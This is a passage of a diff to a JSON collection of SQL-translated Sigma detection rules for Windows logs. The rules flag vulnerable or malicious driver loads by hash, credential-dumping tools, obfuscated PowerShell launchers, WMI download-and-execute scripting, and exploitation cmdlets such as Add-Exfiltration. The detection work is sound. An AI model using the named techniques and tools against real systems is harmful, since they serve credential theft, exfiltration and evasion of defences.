rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", - "tags": [ - "attack.persistence", + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", + "author": "Florian Roth (Nextron Systems)", + "tags": [ "attack.privilege_escalation", - "attack.t1543.003" + "cve.2021.21551", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Unknown" + "Legitimate BIOS driver updates (should be rare)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes 
LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244')))" ], - "filename": "win_system_moriya_rootkit.yml" + "filename": "driver_load_win_vuln_dell_driver.yml" }, { - "title": "Turla Service Install", - "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "title": "PowerShell Scripts Run by a Services", + "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", "status": "test", - "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "win_system_apt_carbonpaper_turla.yml" + "filename": "driver_load_win_powershell_script_installed_as_service.yml" }, { - 
"title": "Credential Dumping Tools Service Execution - System", - "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "title": "Usage Of Malicious POORTRY Signed Driver", + "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", "status": "experimental", + "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1543", + "attack.t1068" + ], + "falsepositives": [ + "Legitimate BIOS driver updates (should be rare)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' 
OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a')))" + ], + "filename": "driver_load_win_mal_poortry_driver.yml" + }, + { + "title": "Credential Dumping Tools Service Execution", + "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "status": "test", "description": "Detects well-known credential dumping tools execution via service execution events", "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ 
@@ -2647,214 +2613,196 @@ "falsepositives": [ "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" - ], - "filename": "win_system_mal_creddumper.yml" - }, - { - "title": "Zerologon Exploitation Using Well-known Tools", - "id": "18f37338-b9bd-4117-a039-280c81f7a596", - "status": "stable", - "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", - "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", - "tags": [ - "attack.t1210", - "attack.lateral_movement" - ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + "filename": "driver_load_win_mal_creddumper.yml" }, { - "title": "New Service Uses Double Ampersand in Path", - "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "title": "Vulnerable WinRing0 Driver Load", + "id": 
"1a42dfa6-6cb2-4df9-9b48-295be477e835", "status": "experimental", - "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7'))" ], - "filename": "win_system_service_install_susp_double_ampersand.yml" + "filename": "driver_load_win_vuln_winring0_driver.yml" }, { - "title": "Service Installed By Unusual Client - System", - "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "title": "Vulnerable GIGABYTE Driver Load", + "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b')))" ], - "filename": "win_system_system_service_installation_by_unusal_client.yml" + "filename": "driver_load_win_vuln_gigabyte_driver.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - System", - "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "title": "Suspicious Scripting in a WMI Consumer", + "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059.005" ], "falsepositives": [ - "Unknown" + "Legitimate administrative scripts" ], "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_stdin_services.yml" + "filename": "sysmon_wmi_susp_scripting.yml" }, { - "title": "smbexec.py Service Installation", - "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "title": "Suspicious Get-ADDBAccount Usage", + "id": "b140afd9-474b-4072-958e-2ebb435abd68", "status": "test", - "description": "Detects the use of smbexec.py tool by detecting a specific service installation", - "author": "Omer Faruk Celik", + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.execution", - 
"attack.t1021.002", - "attack.t1569.002" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" ], - "filename": "win_system_hack_smbexec.yml" + "filename": "posh_pm_get_addbaccount.yml" }, { - "title": "OilRig APT Schedule Task Persistence - System", - "id": "53ba33fd-3a50-4468-a5ef-c583635cfa92", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", + "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", "status": "experimental", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "win_system_apt_oilrig_mar18.yml" + "filename": "posh_pm_invoke_obfuscation_clip.yml" }, { - "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", - "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", + "id": "2f211361-7dce-442d-b78a-c04039677378", "status": "experimental", - "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": 
"win_system_kdcsvc_rc4_downgrade.yml" + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", - "id": "52a85084-6989-40c3-8f32-091e12e17692", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", + "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "status": "experimental", - "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", - "author": "Cybex", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "PowerShell Scripts Installed as Services", - "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", - "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious PowerShell Invocations - Generic - PowerShell 
Module", + "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1569.002" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "win_system_powershell_script_installed_as_service.yml" + "filename": "posh_pm_susp_invocation_generic.yml" }, { - "title": "Turla PNG Dropper Service", - "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", + "title": "Remote PowerShell Session (PS Module)", + "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", "status": "test", - "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - 
"Unlikely" + "Legitimate use remote PowerShell sessions" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" ], - "filename": "win_system_apt_turla_service_png.yml" + "filename": "posh_pm_remote_powershell_session.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - System", - "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", + "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", 
@@ -2867,1137 +2815,1109 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "MSSQL XPCmdshell Option Change", - "id": "d08dd86f-681e-4a00-a92c-1db218754417", - "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution" - ], - "falsepositives": [ - "Legitimate enable/disable of the setting", - "Note that since the event contain the change for both values. 
This means that this will trigger on both enable and disable" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" - ], - "filename": "win_mssql_xp_cmdshell_change.yml" - }, - { - "title": "MSSQL Disable Audit Settings", - "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", - "status": "experimental", - "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "title": "Malicious PowerShell Commandlets - PoshModule", + "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ - "This event should only fire when an administrator is modifying the audit policy. 
Which should be a rare occurrence once it's set up" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE 